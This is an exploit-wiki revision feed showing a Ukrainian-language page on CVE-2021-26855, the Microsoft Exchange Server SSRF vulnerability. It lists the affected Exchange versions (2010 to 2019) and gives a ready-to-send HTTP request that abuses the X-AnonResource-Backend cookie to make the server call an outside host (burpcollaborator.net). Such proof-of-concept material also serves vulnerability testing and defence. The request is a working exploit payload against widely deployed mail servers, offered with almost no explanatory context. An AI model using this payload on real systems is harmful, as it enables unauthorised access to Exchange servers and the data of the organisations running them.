https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-26855_-_Exchange_Server_SSRF%E6%BC%8F%E6%B4%9E%2Fuk
CVE-2021-26855 - Exchange Server SSRF漏洞/uk - Revision history
2026-04-08T10:00:26Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-26855_-_Exchange_Server_SSRF%E6%BC%8F%E6%B4%9E/uk&diff=472&oldid=prev
Pwnwiki: Created page with "== Сфера впливу =="
2021-03-19T11:22:54Z
<p>Created page with "== Сфера впливу =="</p>
<p><b>New page</b></p><div><languages /><br />
<br />
== Вступ до вразливості ==<br />
Вразливість підробки Exchange на стороні сервера (SSRF). Зловмисник, який використовує цю вразливість, може надсилати довільні HTTP-запити та автентифікуватися через Exchange Server.<br />
<br />
<br />
== Сфера впливу ==<br />
<br />
Microsoft Exchange Server: 2010<br />
<br />
Microsoft Exchange Server: 2013<br />
<br />
Microsoft Exchange Server: 2016<br />
<br />
Microsoft Exchange Server: 2019<br />
<br />
<br />
<br />
==SSRF==<br />
<pre><br />
GET /owa/auth/x.js HTTP/1.1<br />
Host: 0.0.0.0<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0<br />
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;<br />
Accept-Language: en<br />
Connection: close<br />
</pre><br />
<br />
[[檔案:Ssrf.jpg]]</div>
Pwnwiki